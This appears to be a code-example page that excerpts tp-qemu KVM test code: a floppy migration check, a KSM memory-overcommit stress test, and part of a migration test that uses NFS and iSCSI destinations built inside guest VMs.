            pid = sync.sync(pid, timeout=floppy_prepare_timeout)[self.srchost]

            self.mig.migrate_wait([self.vms[0]], self.srchost, self.dsthost)

            if not self.is_src:  # Starts in destination
                vm = env.get_vm(self.vms[0])
                session = vm.wait_for_login(timeout=login_timeout)
                written = None
                if self.mount_dir:
                    filepath = os.path.join(self.mount_dir, "test.txt")
                    session.cmd("echo 'test' > %s" % (filepath))
                    output = session.cmd("cat %s" % (filepath))
                    written = "test\n"
                else:   # Windows version.
                    filepath = "A:\\test.txt"
                    session.cmd("echo test > %s" % (filepath))
                    output = session.cmd("type %s" % (filepath))
                    written = "test \n\n"
                if output != written:
                    raise error.TestFail("Data read from the floppy differs"
                                         "from the data written to it."
                                         " EXPECTED: %s GOT: %s" %
                                         (repr(written), repr(output)))

            self.mig._hosts_barrier(self.mig.hosts, self.mig.hosts,
                                    'finish_floppy_test', login_timeout)

        def clean(self):
            super(test_multihost_eject, self).clean()

    test_type = params.get("test_type", "test_singlehost")
    if (test_type in locals()):
        tests_group = locals()[test_type]
        tests_group()
    else:
        raise error.TestFail("Test group '%s' is not defined in"
                             " migration_with_dst_problem test" % test_type)

Example 9

Project: tp-qemu
Source File: ksm_overcommit.py
View license
def run(test, params, env):
    """
    Tests KSM (Kernel Shared Memory) capability by allocating and filling
    KVM guests memory using various values. KVM sets the memory as
    MADV_MERGEABLE so all VM's memory can be merged. The workers in
    guest writes to tmpfs filesystem thus allocations are not limited
    by process max memory, only by VM's memory. Two test modes are supported -
    serial and parallel.

    Serial mode - uses multiple VMs, allocates memory per guest and always
                  verifies the correct number of shared memory.
                  0) Prints out the setup and initialize guest(s)
                  1) Fills guest with the same number (S1)
                  2) Random fill on the first guest
                  3) Random fill of the remaining VMs one by one until the
                     memory is completely filled (KVM stops machines which
                     asks for additional memory until there is available
                     memory) (S2, shouldn't finish)
                  4) Destroy all VMs but the last one
                  5) Checks the last VMs memory for corruption
    Parallel mode - uses one VM with multiple allocator workers. Executes
                   scenarios in parallel to put more stress on the KVM.
                   0) Prints out the setup and initialize guest(s)
                   1) Fills memory with the same number (S1)
                   2) Fills memory with random numbers (S2)
                   3) Verifies all pages
                   4) Fills memory with the same number (S2)
                   5) Changes the last 96B (S3)

    Scenarios:
    S1) Fill all vms with the same value (all pages should be merged into 1)
    S2) Random fill (all pages should be splitted)
    S3) Fill last 96B (change only last 96B of each page; some pages will be
                      merged; there was a bug with data corruption)
    Every worker has unique random key so we are able to verify the filled
    values.

    :param test: kvm test object.
    :param params: Dictionary with test parameters.
    :param env: Dictionary with the test environment.

    :param cfg: ksm_swap - use swap?
    :param cfg: ksm_overcommit_ratio - memory overcommit (serial mode only)
    :param cfg: ksm_parallel_ratio - number of workers (parallel mode only)
    :param cfg: ksm_host_reserve - override memory reserve on host in MB
    :param cfg: ksm_guest_reserve - override memory reserve on guests in MB
    :param cfg: ksm_mode - test mode {serial, parallel}
    :param cfg: ksm_perf_ratio - performance ratio, increase it when your
                                 machine is too slow
    """
    def _start_allocator(vm, session, timeout):
        """
        Execute ksm_overcommit_guest.py on guest, wait until it's initialized.

        :param vm: VM object.
        :param session: Remote session to a VM object.
        :param timeout: Timeout that will be used to verify if
                ksm_overcommit_guest.py started properly.
        """
        logging.debug("Starting ksm_overcommit_guest.py on guest %s", vm.name)
        session.sendline("python /tmp/ksm_overcommit_guest.py")
        try:
            session.read_until_last_line_matches(["PASS:", "FAIL:"], timeout)
        except aexpect.ExpectProcessTerminatedError, details:
            e_msg = ("Command ksm_overcommit_guest.py on vm '%s' failed: %s" %
                     (vm.name, str(details)))
            raise error.TestFail(e_msg)

    def _execute_allocator(command, vm, session, timeout):
        """
        Execute a given command on ksm_overcommit_guest.py main loop,
        indicating the vm the command was executed on.

        :param command: Command that will be executed.
        :param vm: VM object.
        :param session: Remote session to VM object.
        :param timeout: Timeout used to verify expected output.

        :return: Tuple (match index, data)
        """
        logging.debug("Executing '%s' on ksm_overcommit_guest.py loop, "
                      "vm: %s, timeout: %s", command, vm.name, timeout)
        session.sendline(command)
        try:
            (match, data) = session.read_until_last_line_matches(
                ["PASS:", "FAIL:"],
                timeout)
        except aexpect.ExpectProcessTerminatedError, details:
            e_msg = ("Failed to execute command '%s' on "
                     "ksm_overcommit_guest.py, vm '%s': %s" %
                     (command, vm.name, str(details)))
            raise error.TestFail(e_msg)
        return (match, data)

    def get_ksmstat():
        """
        Return sharing memory by ksm in MB

        :return: memory in MB
        """
        fpages = open('/sys/kernel/mm/ksm/pages_sharing')
        ksm_pages = int(fpages.read())
        fpages.close()
        return ((ksm_pages * 4096) / 1e6)

    def initialize_guests():
        """
        Initialize guests (fill their memories with specified patterns).
        """
        logging.info("Phase 1: filling guest memory pages")
        for session in lsessions:
            vm = lvms[lsessions.index(session)]

            logging.debug("Turning off swap on vm %s", vm.name)
            session.cmd("swapoff -a", timeout=300)

            # Start the allocator
            _start_allocator(vm, session, 60 * perf_ratio)

        # Execute allocator on guests
        for i in range(0, vmsc):
            vm = lvms[i]

            cmd = "mem = MemFill(%d, %s, %s)" % (ksm_size, skeys[i], dkeys[i])
            _execute_allocator(cmd, vm, lsessions[i], 60 * perf_ratio)

            cmd = "mem.value_fill(%d)" % skeys[0]
            _execute_allocator(cmd, vm, lsessions[i],
                               fill_base_timeout * 2 * perf_ratio)

            # Let ksm_overcommit_guest.py do its job
            # (until shared mem reaches expected value)
            shm = 0
            j = 0
            logging.debug("Target shared meminfo for guest %s: %s", vm.name,
                          ksm_size)
            while ((new_ksm and (shm < (ksm_size * (i + 1)))) or
                    (not new_ksm and (shm < (ksm_size)))):
                if j > 64:
                    logging.debug(utils_test.get_memory_info(lvms))
                    raise error.TestError("SHM didn't merge the memory until "
                                          "the DL on guest: %s" % vm.name)
                pause = ksm_size / 200 * perf_ratio
                logging.debug("Waiting %ds before proceeding...", pause)
                time.sleep(pause)
                if (new_ksm):
                    shm = get_ksmstat()
                else:
                    shm = vm.get_shared_meminfo()
                logging.debug("Shared meminfo for guest %s after "
                              "iteration %s: %s", vm.name, j, shm)
                j += 1

        # Keep some reserve
        pause = ksm_size / 200 * perf_ratio
        logging.debug("Waiting %ds before proceeding...", pause)
        time.sleep(pause)

        logging.debug(utils_test.get_memory_info(lvms))
        logging.info("Phase 1: PASS")

    def separate_first_guest():
        """
        Separate memory of the first guest by generating special random series
        """
        logging.info("Phase 2: Split the pages on the first guest")

        cmd = "mem.static_random_fill()"
        data = _execute_allocator(cmd, lvms[0], lsessions[0],
                                  fill_base_timeout * 2 * perf_ratio)[1]

        r_msg = data.splitlines()[-1]
        logging.debug("Return message of static_random_fill: %s", r_msg)
        out = int(r_msg.split()[4])
        logging.debug("Performance: %dMB * 1000 / %dms = %dMB/s", ksm_size,
                      out, (ksm_size * 1000 / out))
        logging.debug(utils_test.get_memory_info(lvms))
        logging.debug("Phase 2: PASS")

    def split_guest():
        """
        Sequential split of pages on guests up to memory limit
        """
        logging.info("Phase 3a: Sequential split of pages on guests up to "
                     "memory limit")
        last_vm = 0
        session = None
        vm = None
        for i in range(1, vmsc):
            # Check VMs
            for j in range(0, vmsc):
                if not lvms[j].is_alive:
                    e_msg = ("VM %d died while executing static_random_fill on"
                             " VM %d in allocator loop" % (j, i))
                    raise error.TestFail(e_msg)
            vm = lvms[i]
            session = lsessions[i]
            cmd = "mem.static_random_fill()"
            logging.debug("Executing %s on ksm_overcommit_guest.py loop, "
                          "vm: %s", cmd, vm.name)
            session.sendline(cmd)

            out = ""
            try:
                logging.debug("Watching host mem while filling vm %s memory",
                              vm.name)
                while (not out.startswith("PASS") and
                       not out.startswith("FAIL")):
                    if not vm.is_alive():
                        e_msg = ("VM %d died while executing "
                                 "static_random_fill on allocator loop" % i)
                        raise error.TestFail(e_msg)
                    free_mem = int(utils_memory.read_from_meminfo("MemFree"))
                    if (ksm_swap):
                        free_mem = (free_mem +
                                    int(utils_memory.read_from_meminfo("SwapFree")))
                    logging.debug("Free memory on host: %d", free_mem)

                    # We need to keep some memory for python to run.
                    if (free_mem < 64000) or (ksm_swap and
                                              free_mem < (450000 * perf_ratio)):
                        vm.pause()
                        for j in range(0, i):
                            lvms[j].destroy(gracefully=False)
                        time.sleep(20)
                        vm.resume()
                        logging.debug("Only %s free memory, killing %d guests",
                                      free_mem, (i - 1))
                        last_vm = i
                    out = session.read_nonblocking(0.1, 1)
                    time.sleep(2)
            except OSError:
                logging.debug("Only %s host free memory, killing %d guests",
                              free_mem, (i - 1))
                logging.debug("Stopping %s", vm.name)
                vm.pause()
                for j in range(0, i):
                    logging.debug("Destroying %s", lvms[j].name)
                    lvms[j].destroy(gracefully=False)
                time.sleep(20)
                vm.resume()
                last_vm = i

            if last_vm != 0:
                break
            logging.debug("Memory filled for guest %s", vm.name)

        logging.info("Phase 3a: PASS")

        logging.info("Phase 3b: Verify memory of the max stressed VM")
        for i in range(last_vm + 1, vmsc):
            lsessions[i].close()
            if i == (vmsc - 1):
                logging.debug(utils_test.get_memory_info([lvms[i]]))
            logging.debug("Destroying guest %s", lvms[i].name)
            lvms[i].destroy(gracefully=False)

        # Verify last machine with randomly generated memory
        cmd = "mem.static_random_verify()"
        _execute_allocator(cmd, lvms[last_vm], lsessions[last_vm],
                           (mem / 200 * 50 * perf_ratio))
        logging.debug(utils_test.get_memory_info([lvms[last_vm]]))

        lsessions[last_vm].cmd_output("die()", 20)
        lvms[last_vm].destroy(gracefully=False)
        logging.info("Phase 3b: PASS")

    def split_parallel():
        """
        Parallel page spliting
        """
        logging.info("Phase 1: parallel page spliting")
        # We have to wait until allocator is finished (it waits 5 seconds to
        # clean the socket

        session = lsessions[0]
        vm = lvms[0]
        for i in range(1, max_alloc):
            lsessions.append(vm.wait_for_login(timeout=360))

        session.cmd("swapoff -a", timeout=300)

        for i in range(0, max_alloc):
            # Start the allocator
            _start_allocator(vm, lsessions[i], 60 * perf_ratio)

        logging.info("Phase 1: PASS")

        logging.info("Phase 2a: Simultaneous merging")
        logging.debug("Memory used by allocator on guests = %dMB",
                      (ksm_size / max_alloc))

        for i in range(0, max_alloc):
            cmd = "mem = MemFill(%d, %s, %s)" % ((ksm_size / max_alloc),
                                                 skeys[i], dkeys[i])
            _execute_allocator(cmd, vm, lsessions[i], 60 * perf_ratio)

            cmd = "mem.value_fill(%d)" % (skeys[0])
            _execute_allocator(cmd, vm, lsessions[i],
                               fill_base_timeout * perf_ratio)

        # Wait until ksm_overcommit_guest.py merges pages (3 * ksm_size / 3)
        shm = 0
        i = 0
        logging.debug("Target shared memory size: %s", ksm_size)
        while (shm < ksm_size):
            if i > 64:
                logging.debug(utils_test.get_memory_info(lvms))
                raise error.TestError("SHM didn't merge the memory until DL")
            pause = ksm_size / 200 * perf_ratio
            logging.debug("Waiting %ds before proceed...", pause)
            time.sleep(pause)
            if (new_ksm):
                shm = get_ksmstat()
            else:
                shm = vm.get_shared_meminfo()
            logging.debug("Shared meminfo after attempt %s: %s", i, shm)
            i += 1

        logging.debug(utils_test.get_memory_info([vm]))
        logging.info("Phase 2a: PASS")

        logging.info("Phase 2b: Simultaneous spliting")
        # Actual splitting
        for i in range(0, max_alloc):
            cmd = "mem.static_random_fill()"
            data = _execute_allocator(cmd, vm, lsessions[i],
                                      fill_base_timeout * perf_ratio)[1]

            data = data.splitlines()[-1]
            logging.debug(data)
            out = int(data.split()[4])
            logging.debug("Performance: %dMB * 1000 / %dms = %dMB/s",
                          (ksm_size / max_alloc), out,
                          (ksm_size * 1000 / out / max_alloc))
        logging.debug(utils_test.get_memory_info([vm]))
        logging.info("Phase 2b: PASS")

        logging.info("Phase 2c: Simultaneous verification")
        for i in range(0, max_alloc):
            cmd = "mem.static_random_verify()"
            data = _execute_allocator(cmd, vm, lsessions[i],
                                      (mem / 200 * 50 * perf_ratio))[1]
        logging.info("Phase 2c: PASS")

        logging.info("Phase 2d: Simultaneous merging")
        # Actual splitting
        for i in range(0, max_alloc):
            cmd = "mem.value_fill(%d)" % skeys[0]
            data = _execute_allocator(cmd, vm, lsessions[i],
                                      fill_base_timeout * 2 * perf_ratio)[1]
        logging.debug(utils_test.get_memory_info([vm]))
        logging.info("Phase 2d: PASS")

        logging.info("Phase 2e: Simultaneous verification")
        for i in range(0, max_alloc):
            cmd = "mem.value_check(%d)" % skeys[0]
            data = _execute_allocator(cmd, vm, lsessions[i],
                                      (mem / 200 * 50 * perf_ratio))[1]
        logging.info("Phase 2e: PASS")

        logging.info("Phase 2f: Simultaneous spliting last 96B")
        for i in range(0, max_alloc):
            cmd = "mem.static_random_fill(96)"
            data = _execute_allocator(cmd, vm, lsessions[i],
                                      fill_base_timeout * perf_ratio)[1]

            data = data.splitlines()[-1]
            out = int(data.split()[4])
            logging.debug("Performance: %dMB * 1000 / %dms = %dMB/s",
                          ksm_size / max_alloc, out,
                          (ksm_size * 1000 / out / max_alloc))

        logging.debug(utils_test.get_memory_info([vm]))
        logging.info("Phase 2f: PASS")

        logging.info("Phase 2g: Simultaneous verification last 96B")
        for i in range(0, max_alloc):
            cmd = "mem.static_random_verify(96)"
            _, data = _execute_allocator(cmd, vm, lsessions[i],
                                         (mem / 200 * 50 * perf_ratio))
        logging.debug(utils_test.get_memory_info([vm]))
        logging.info("Phase 2g: PASS")

        logging.debug("Cleaning up...")
        for i in range(0, max_alloc):
            lsessions[i].cmd_output("die()", 20)
        session.close()
        vm.destroy(gracefully=False)

    # Main test code
    logging.info("Starting phase 0: Initialization")
    if utils.run("ps -C ksmtuned", ignore_status=True).exit_status == 0:
        logging.info("Killing ksmtuned...")
        utils.run("killall ksmtuned")
    new_ksm = False
    if (os.path.exists("/sys/kernel/mm/ksm/run")):
        utils.run("echo 50 > /sys/kernel/mm/ksm/sleep_millisecs")
        utils.run("echo 5000 > /sys/kernel/mm/ksm/pages_to_scan")
        utils.run("echo 1 > /sys/kernel/mm/ksm/run")

        e_up = "/sys/kernel/mm/transparent_hugepage/enabled"
        e_rh = "/sys/kernel/mm/redhat_transparent_hugepage/enabled"
        if os.path.exists(e_up):
            utils.run("echo 'never' > %s" % e_up)
        if os.path.exists(e_rh):
            utils.run("echo 'never' > %s" % e_rh)
        new_ksm = True
    else:
        try:
            utils.run("modprobe ksm")
            utils.run("ksmctl start 5000 100")
        except error.CmdError, details:
            raise error.TestFail("Failed to load KSM: %s" % details)

    # host_reserve: mem reserve kept for the host system to run
    host_reserve = int(params.get("ksm_host_reserve", -1))
    if (host_reserve == -1):
        # default host_reserve = MemAvailable + one_minimal_guest(128MB)
        # later we add 64MB per additional guest
        host_reserve = ((utils_memory.memtotal() -
                         utils_memory.read_from_meminfo("MemFree")) /
                        1024 + 128)
        # using default reserve
        _host_reserve = True
    else:
        _host_reserve = False

    # guest_reserve: mem reserve kept to avoid guest OS to kill processes
    guest_reserve = int(params.get("ksm_guest_reserve", -1))
    if (guest_reserve == -1):
        # default guest_reserve = minimal_system_mem(256MB)
        # later we add tmpfs overhead
        guest_reserve = 256
        # using default reserve
        _guest_reserve = True
    else:
        _guest_reserve = False

    max_vms = int(params.get("max_vms", 2))
    overcommit = float(params.get("ksm_overcommit_ratio", 2.0))
    max_alloc = int(params.get("ksm_parallel_ratio", 1))

    # vmsc: count of all used VMs
    vmsc = int(overcommit) + 1
    vmsc = max(vmsc, max_vms)

    if (params['ksm_mode'] == "serial"):
        max_alloc = vmsc
        if _host_reserve:
            # First round of additional guest reserves
            host_reserve += vmsc * 64
            _host_reserve = vmsc

    host_mem = (int(utils_memory.memtotal()) / 1024 - host_reserve)

    ksm_swap = False
    if params.get("ksm_swap") == "yes":
        ksm_swap = True

    # Performance ratio
    perf_ratio = params.get("ksm_perf_ratio")
    if perf_ratio:
        perf_ratio = float(perf_ratio)
    else:
        perf_ratio = 1

    if (params['ksm_mode'] == "parallel"):
        vmsc = 1
        overcommit = 1
        mem = host_mem
        # 32bit system adjustment
        if "64" not in params.get("vm_arch_name"):
            logging.debug("Probably i386 guest architecture, "
                          "max allocator mem = 2G")
            # Guest can have more than 2G but
            # kvm mem + 1MB (allocator itself) can't
            if (host_mem > 3100):
                mem = 3100

        if os.popen("uname -i").readline().startswith("i386"):
            logging.debug("Host is i386 architecture, max guest mem is 2G")
            # Guest system with qemu overhead (64M) can't have more than 2G
            if mem > 3100 - 64:
                mem = 3100 - 64

    else:
        # mem: Memory of the guest systems. Maximum must be less than
        # host's physical ram
        mem = int(overcommit * host_mem / vmsc)

        # 32bit system adjustment
        if not params['image_name'].endswith("64"):
            logging.debug("Probably i386 guest architecture, "
                          "max allocator mem = 2G")
            # Guest can have more than 2G but
            # kvm mem + 1MB (allocator itself) can't
            if mem - guest_reserve - 1 > 3100:
                vmsc = int(math.ceil((host_mem * overcommit) /
                                     (3100 + guest_reserve)))
                if _host_reserve:
                    host_reserve += (vmsc - _host_reserve) * 64
                    host_mem -= (vmsc - _host_reserve) * 64
                    _host_reserve = vmsc
                mem = int(math.floor(host_mem * overcommit / vmsc))

        if os.popen("uname -i").readline().startswith("i386"):
            logging.debug("Host is i386 architecture, max guest mem is 2G")
            # Guest system with qemu overhead (64M) can't have more than 2G
            if mem > 3100 - 64:
                vmsc = int(math.ceil((host_mem * overcommit) /
                                     (3100 - 64.0)))
                if _host_reserve:
                    host_reserve += (vmsc - _host_reserve) * 64
                    host_mem -= (vmsc - _host_reserve) * 64
                    _host_reserve = vmsc
                mem = int(math.floor(host_mem * overcommit / vmsc))

    # 0.055 represents OS + TMPFS additional reserve per guest ram MB
    if _guest_reserve:
        guest_reserve += math.ceil(mem * 0.055)

    swap = int(utils_memory.read_from_meminfo("SwapTotal")) / 1024

    logging.debug("Overcommit = %f", overcommit)
    logging.debug("True overcommit = %f ", (float(vmsc * mem) /
                                            float(host_mem)))
    logging.debug("Host memory = %dM", host_mem)
    logging.debug("Guest memory = %dM", mem)
    logging.debug("Using swap = %s", ksm_swap)
    logging.debug("Swap = %dM", swap)
    logging.debug("max_vms = %d", max_vms)
    logging.debug("Count of all used VMs = %d", vmsc)
    logging.debug("Performance_ratio = %f", perf_ratio)

    # Generate unique keys for random series
    skeys = []
    dkeys = []
    for i in range(0, max(vmsc, max_alloc)):
        key = random.randrange(0, 255)
        while key in skeys:
            key = random.randrange(0, 255)
        skeys.append(key)

        key = random.randrange(0, 999)
        while key in dkeys:
            key = random.randrange(0, 999)
        dkeys.append(key)

    logging.debug("skeys: %s", skeys)
    logging.debug("dkeys: %s", dkeys)

    lvms = []
    lsessions = []

    # As we don't know the number and memory amount of VMs in advance,
    # we need to specify and create them here
    vm_name = params["main_vm"]
    params['mem'] = mem
    params['vms'] = vm_name
    # Associate pidfile name
    params['pid_' + vm_name] = utils_misc.generate_tmp_file_name(vm_name,
                                                                 'pid')
    if not params.get('extra_params'):
        params['extra_params'] = ' '
    params['extra_params_' + vm_name] = params.get('extra_params')
    params['extra_params_' + vm_name] += (" -pidfile %s" %
                                          (params.get('pid_' + vm_name)))
    params['extra_params'] = params.get('extra_params_' + vm_name)

    # ksm_size: amount of memory used by allocator
    ksm_size = mem - guest_reserve
    logging.debug("Memory used by allocator on guests = %dM", ksm_size)
    fill_base_timeout = ksm_size / 10

    # Creating the first guest
    env_process.preprocess_vm(test, params, env, vm_name)
    lvms.append(env.get_vm(vm_name))
    if not lvms[0]:
        raise error.TestError("VM object not found in environment")
    if not lvms[0].is_alive():
        raise error.TestError("VM seems to be dead; Test requires a living "
                              "VM")

    logging.debug("Booting first guest %s", lvms[0].name)

    lsessions.append(lvms[0].wait_for_login(timeout=360))
    # Associate vm PID
    try:
        tmp = open(params.get('pid_' + vm_name), 'r')
        params['pid_' + vm_name] = int(tmp.readline())
    except Exception:
        raise error.TestFail("Could not get PID of %s" % (vm_name))

    # Creating other guest systems
    for i in range(1, vmsc):
        vm_name = "vm" + str(i + 1)
        params['pid_' + vm_name] = utils_misc.generate_tmp_file_name(vm_name,
                                                                     'pid')
        params['extra_params_' + vm_name] = params.get('extra_params')
        params['extra_params_' + vm_name] += (" -pidfile %s" %
                                              (params.get('pid_' + vm_name)))
        params['extra_params'] = params.get('extra_params_' + vm_name)

        # Last VM is later used to run more allocators simultaneously
        lvms.append(lvms[0].clone(vm_name, params))
        env.register_vm(vm_name, lvms[i])
        params['vms'] += " " + vm_name

        logging.debug("Booting guest %s", lvms[i].name)
        lvms[i].create()
        if not lvms[i].is_alive():
            raise error.TestError("VM %s seems to be dead; Test requires a"
                                  "living VM" % lvms[i].name)

        lsessions.append(lvms[i].wait_for_login(timeout=360))
        try:
            tmp = open(params.get('pid_' + vm_name), 'r')
            params['pid_' + vm_name] = int(tmp.readline())
        except Exception:
            raise error.TestFail("Could not get PID of %s" % (vm_name))

    # Let guests rest a little bit :-)
    pause = vmsc * 2 * perf_ratio
    logging.debug("Waiting %ds before proceed", pause)
    time.sleep(vmsc * 2 * perf_ratio)
    logging.debug(utils_test.get_memory_info(lvms))

    # Copy ksm_overcommit_guest.py into guests
    shared_dir = os.path.dirname(data_dir.get_data_dir())
    vksmd_src = os.path.join(shared_dir, "scripts", "ksm_overcommit_guest.py")
    dst_dir = "/tmp"
    for vm in lvms:
        vm.copy_files_to(vksmd_src, dst_dir)
    logging.info("Phase 0: PASS")

    if params['ksm_mode'] == "parallel":
        logging.info("Starting KSM test parallel mode")
        split_parallel()
        logging.info("KSM test parallel mode: PASS")
    elif params['ksm_mode'] == "serial":
        logging.info("Starting KSM test serial mode")
        initialize_guests()
        separate_first_guest()
        split_guest()
        logging.info("KSM test serial mode: PASS")

Example 10

View license
@error.context_aware
def run(test, params, env):
    """
    KVM migration with destination problems.
    Contains group of test for testing qemu behavior if some
    problems happens on destination side.

    Tests are described right in test classes comments down in code.

    Test needs params: nettype = bridge.

    :param test: kvm test object.
    :param params: Dictionary with test parameters.
    :param env: Dictionary with the test environment.
    """
    login_timeout = int(params.get("login_timeout", 360))
    mig_timeout = float(params.get("mig_timeout", "3600"))
    mig_protocol = params.get("migration_protocol", "tcp")

    test_rand = None
    mount_path = None
    while mount_path is None or os.path.exists(mount_path):
        test_rand = utils.generate_random_string(3)
        mount_path = ("%s/ni_mount_%s" %
                      (data_dir.get_data_dir(), test_rand))

    mig_dst = os.path.join(mount_path, "mig_dst")

    migration_exec_cmd_src = params.get("migration_exec_cmd_src",
                                        "gzip -c > %s")
    migration_exec_cmd_src = (migration_exec_cmd_src % (mig_dst))

    class MiniSubtest(object):

        def __new__(cls, *args, **kargs):
            self = super(MiniSubtest, cls).__new__(cls)
            ret = None
            exc_info = None
            if args is None:
                args = []
            try:
                try:
                    ret = self.test(*args, **kargs)
                except Exception:
                    exc_info = sys.exc_info()
            finally:
                if hasattr(self, "clean"):
                    try:
                        self.clean()
                    except Exception:
                        if exc_info is None:
                            raise
                    if exc_info:
                        raise exc_info[0], exc_info[1], exc_info[2]
            return ret

    def control_service(session, service, init_service, action, timeout=60):
        """
        Start service on guest.

        :param vm: Virtual machine for vm.
        :param service: service to stop.
        :param action: action with service (start|stop|restart)
        :param init_service: name of service for old service control.
        """
        status = utils_misc.get_guest_service_status(session, service,
                                                     service_former=init_service)
        if action == "start" and status == "active":
            logging.debug("%s already started, no need start it again.",
                          service)
            return
        if action == "stop" and status == "inactive":
            logging.debug("%s already stopped, no need stop it again.",
                          service)
            return
        try:
            session.cmd("systemctl --version", timeout=timeout)
            session.cmd("systemctl %s %s.service" % (action, service),
                        timeout=timeout)
        except:
            session.cmd("service %s %s" % (init_service, action),
                        timeout=timeout)

    def set_nfs_server(vm, share_cfg):
        """
        Start nfs server on guest.

        :param vm: Virtual machine for vm.
        """
        session = vm.wait_for_login(timeout=login_timeout)
        cmd = "echo '%s' > /etc/exports" % (share_cfg)
        control_service(session, "nfs-server", "nfs", "stop")
        session.cmd(cmd)
        control_service(session, "nfs-server", "nfs", "start")
        session.cmd("iptables -F")
        session.close()

    def umount(mount_path):
        """
        Umount nfs server mount_path

        :param mount_path: path where nfs dir will be placed.
        """
        utils.run("umount -f %s" % (mount_path))

    def create_file_disk(dst_path, size):
        """
        Create file with size and create there ext3 filesystem.

        :param dst_path: Path to file.
        :param size: Size of file in MB
        """
        utils.run("dd if=/dev/zero of=%s bs=1M count=%s" % (dst_path, size))
        utils.run("mkfs.ext3 -F %s" % (dst_path))

    def mount(disk_path, mount_path, options=None):
        """
        Mount Disk to path

        :param disk_path: Path to disk
        :param mount_path: Path where disk will be mounted.
        :param options: String with options for mount
        """
        if options is None:
            options = ""
        else:
            options = "%s" % options

        utils.run("mount %s %s %s" % (options, disk_path, mount_path))

    def find_disk_vm(vm, disk_serial):
        """
        Find disk on vm which ends with disk_serial

        :param vm: VM where to find a disk.
        :param disk_serial: sufix of disk id.

        :return: string Disk path
        """
        session = vm.wait_for_login(timeout=login_timeout)

        disk_path = os.path.join("/", "dev", "disk", "by-id")
        disks = session.cmd("ls %s" % disk_path).split("\n")
        session.close()
        disk = filter(lambda x: x.endswith(disk_serial), disks)
        if not disk:
            return None
        return os.path.join(disk_path, disk[0])

    def prepare_disk(vm, disk_path, mount_path):
        """
        Create Ext3 on disk a send there data from main disk.

        :param vm: VM where to find a disk.
        :param disk_path: Path to disk in guest system.
        """
        session = vm.wait_for_login(timeout=login_timeout)
        session.cmd("mkfs.ext3 -F %s" % (disk_path))
        session.cmd("mount %s %s" % (disk_path, mount_path))
        session.close()

    def disk_load(vm, src_path, dst_path, copy_timeout=None, dsize=None):
        """
        Start disk load. Cyclic copy from src_path to dst_path.

        :param vm: VM where to find a disk.
        :param src_path: Source of data
        :param dst_path: Path to destination
        :param copy_timeout: Timeout for copy
        :param dsize: Size of data block which is periodical copied.
        """
        if dsize is None:
            dsize = 100
        session = vm.wait_for_login(timeout=login_timeout)
        cmd = ("nohup /bin/bash -c 'while true; do dd if=%s of=%s bs=1M "
               "count=%s; done;' 2> /dev/null &" % (src_path, dst_path, dsize))
        pid = re.search(r"\[.+\] (.+)",
                        session.cmd_output(cmd, timeout=copy_timeout))
        return pid.group(1)

    class IscsiServer_tgt(object):

        """
        Class for set and start Iscsi server.
        """

        def __init__(self):
            self.server_name = "autotest_guest_" + test_rand
            self.user = "user1"
            self.passwd = "pass"
            self.config = """
<target %s:dev01>
    backing-store %s
    incominguser %s %s
</target>
"""

        def set_iscsi_server(self, vm_ds, disk_path, disk_size):
            """
            Set iscsi server with some variant.

            @oaram vm_ds: VM where should be iscsi server started.
            :param disk_path: path where should be disk placed.
            :param disk_size: size of new disk.
            """
            session = vm_ds.wait_for_login(timeout=login_timeout)

            session.cmd("dd if=/dev/zero of=%s bs=1M count=%s" % (disk_path,
                                                                  disk_size))
            status, output = session.cmd_status_output("setenforce 0")
            if status not in [0, 127]:
                logging.warn("Function setenforce fails.\n %s" % (output))

            config = self.config % (self.server_name, disk_path,
                                    self.user, self.passwd)
            cmd = "cat > /etc/tgt/conf.d/virt.conf << EOF" + config + "EOF"
            control_service(session, "tgtd", "tgtd", "stop")
            session.sendline(cmd)
            control_service(session, "tgtd", "tgtd", "start")
            session.cmd("iptables -F")
            session.close()

        def find_disk(self):
            disk_path = os.path.join("/", "dev", "disk", "by-path")
            disks = utils.run("ls %s" % disk_path).stdout.split("\n")
            disk = filter(lambda x: self.server_name in x, disks)
            if disk is []:
                return None
            return os.path.join(disk_path, disk[0].strip())

        def connect(self, vm_ds):
            """
            Connect to iscsi server on guest.

            :param vm_ds: Guest where is iscsi server running.

            :return: path where disk is connected.
            """
            ip_dst = vm_ds.get_address()
            utils.run("iscsiadm -m discovery -t st -p %s" % (ip_dst))

            server_ident = ('iscsiadm -m node --targetname "%s:dev01"'
                            ' --portal %s' % (self.server_name, ip_dst))
            utils.run("%s --op update --name node.session.auth.authmethod"
                      " --value CHAP" % (server_ident))
            utils.run("%s --op update --name node.session.auth.username"
                      " --value %s" % (server_ident, self.user))
            utils.run("%s --op update --name node.session.auth.password"
                      " --value %s" % (server_ident, self.passwd))
            utils.run("%s --login" % (server_ident))
            time.sleep(1.0)
            return self.find_disk()

        def disconnect(self):
            server_ident = ('iscsiadm -m node --targetname "%s:dev01"' %
                            (self.server_name))
            utils.run("%s --logout" % (server_ident))

    class IscsiServer(object):

        """
        Iscsi server implementation interface.
        """

        def __init__(self, iscsi_type, *args, **kargs):
            if iscsi_type == "tgt":
                self.ic = IscsiServer_tgt(*args, **kargs)
            else:
                raise NotImplementedError()

        def __getattr__(self, name):
            if self.ic:
                return self.ic.__getattribute__(name)
            raise AttributeError("Cannot find attribute %s in class" % name)

    class test_read_only_dest(MiniSubtest):

        """
        Migration to read-only destination by using a migration to file.

        1) Start guest with NFS server.
        2) Config NFS server share for read-only.
        3) Mount the read-only share to host.
        4) Start second guest and try to migrate to read-only dest.

        result) Migration should fail with error message about read-only dst.
        """

        def test(self):
            if params.get("nettype") != "bridge":
                raise error.TestNAError("Unable start test without params"
                                        " nettype=bridge.")

            vm_ds = env.get_vm("virt_test_vm2_data_server")
            vm_guest = env.get_vm("virt_test_vm1_guest")
            ro_timeout = int(params.get("read_only_timeout", "480"))
            exp_str = r".*Read-only file system.*"
            utils.run("mkdir -p %s" % (mount_path))

            vm_ds.verify_alive()
            vm_guest.create()
            vm_guest.verify_alive()

            set_nfs_server(vm_ds, "/mnt *(ro,async,no_root_squash)")

            mount_src = "%s:/mnt" % (vm_ds.get_address())
            mount(mount_src, mount_path,
                  "-o hard,timeo=14,rsize=8192,wsize=8192")
            vm_guest.migrate(mig_timeout, mig_protocol,
                             not_wait_for_migration=True,
                             migration_exec_cmd_src=migration_exec_cmd_src,
                             env=env)

            if not utils_misc.wait_for(lambda: process_output_check(
                                       vm_guest.process, exp_str),
                                       timeout=ro_timeout, first=2):
                raise error.TestFail("The Read-only file system warning not"
                                     " come in time limit.")

        def clean(self):
            if os.path.exists(mig_dst):
                os.remove(mig_dst)
